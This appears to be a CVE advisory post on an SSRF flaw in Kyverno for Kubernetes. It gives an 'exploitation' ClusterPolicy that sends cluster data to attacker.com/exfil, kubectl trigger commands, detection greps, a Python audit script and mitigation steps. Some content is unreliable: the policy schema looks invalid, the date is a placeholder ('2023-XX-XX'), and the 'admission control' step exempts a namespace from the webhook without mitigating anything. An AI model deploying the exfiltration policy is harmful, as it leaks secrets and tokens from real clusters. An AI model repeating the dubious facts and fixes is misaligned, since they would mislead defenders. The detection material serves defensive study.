How the CVE Works
Kyverno’s Service Call functionality in Kubernetes allows policies to fetch external data. The vulnerability arises when an attacker-controlled Kyverno policy abuses this feature to perform SSRF. By crafting a malicious `ClusterPolicy` with an external URL in the `service.url` field, the attacker forces Kyverno to send HTTP requests to an external server, exfiltrating sensitive cluster data like secrets. The policy’s `apiCall` method, meant for internal services, fails to validate external domains, enabling data leakage via HTTP requests to attacker-controlled hosts.
DailyCVE Form
Platform: Kubernetes (Kyverno)
Version: <1.10.2
Vulnerability: SSRF
Severity: Critical
Date: 2023-XX-XX
What Undercode Says:
Exploitation:
1. Policy Injection:
```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: malicious-ssrf
spec:
  rules:
  - name: exfiltrate-data
    service:
      url: http://attacker.com/exfil
```
2. Trigger Request:
```bash
kubectl apply -f malicious-policy.yaml
kubectl create configmap dummy --from-literal=key=value
```
Detection:
1. Audit Policies:
kubectl get clusterpolicies -o yaml | grep "service.url"
2. Monitor Outbound Traffic:
kubectl logs -n kyverno -l app=kyverno --tail=100 | grep "external"
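As an added check that is not part of the original post, the following Python script parses the output of `kubectl get clusterpolicies -o json` and reports every `service.url` whose host is not an in-cluster DNS name. It walks the whole policy spec, so it catches both the rule-level shape shown above and Kyverno's `context[].apiCall.service.url` form. The two sample policies embedded in it are constructed, and the default `cluster.local` DNS domain is assumed.

```python
import json
from urllib.parse import urlparse

# Hostname suffixes that resolve inside the cluster (assumes the default
# "cluster.local" DNS domain). Anything else is treated as an external target.
INTERNAL_SUFFIXES = (".svc", ".svc.cluster.local")


def is_internal(url):
    """True if the URL's host is an in-cluster service name."""
    host = (urlparse(url).hostname or "").lower()
    return host == "kubernetes.default" or host.endswith(INTERNAL_SUFFIXES)


def find_service_urls(obj, path):
    """Recursively yield (json_path, url) for every {"service": {"url": ...}} in obj."""
    if isinstance(obj, dict):
        svc = obj.get("service")
        if isinstance(svc, dict) and isinstance(svc.get("url"), str):
            yield f"{path}.service.url", svc["url"]
        for key, value in obj.items():
            yield from find_service_urls(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from find_service_urls(value, f"{path}[{index}]")


def audit_policies(policy_list_json):
    """Return (policy name, json path, url) for each service URL that is not in-cluster."""
    findings = []
    for policy in json.loads(policy_list_json).get("items", []):
        name = policy["metadata"]["name"]
        for path, url in find_service_urls(policy.get("spec", {}), "spec"):
            if not is_internal(url):
                findings.append((name, path, url))
    return findings


# Constructed sample: one legitimate in-cluster API call and one external exfil URL.
SAMPLE = json.dumps({"items": [
    {"metadata": {"name": "in-cluster-lookup"},
     "spec": {"rules": [{"name": "lookup", "context": [{"name": "ns", "apiCall": {
         "service": {"url": "https://kubernetes.default.svc/api/v1/namespaces"}}}]}]}},
    {"metadata": {"name": "malicious-ssrf"},
     "spec": {"rules": [{"name": "exfiltrate-data",
                         "service": {"url": "http://attacker.example/exfil"}}]}},
]})

if __name__ == "__main__":
    for name, path, url in audit_policies(SAMPLE):
        print(f"EXTERNAL service URL in ClusterPolicy {name} at {path}: {url}")
```

Pipe real cluster output in with `kubectl get clusterpolicies -o json | python3 audit.py` by replacing `SAMPLE` with `sys.stdin.read()`.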
Mitigation:
1. Patch Kyverno:
helm upgrade kyverno kyverno/kyverno --version 1.10.2
2. Network Policies:
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-kyverno-egress
  namespace: kyverno   # the namespace Kyverno runs in (see the detection step above)
spec:
  podSelector:
    matchLabels:
      app: kyverno
  policyTypes:
  - Egress
  egress: []
```
An empty egress list also blocks Kyverno's own calls to the Kubernetes API server and to cluster DNS, so add explicit allow rules for those before applying this in a live cluster.
3. Admission Control:
kubectl label ns kyverno-admission webhook.kyverno.io/exclude=true
Impact Analysis:
- Data Exfiltration: Secrets, configmaps, tokens.
- Cluster Compromise: Lateral movement via stolen credentials.
References:
- Kyverno SSRF Fix: GitHub Commit
- CVE Details: NVD
Sources:
Reported By: github.com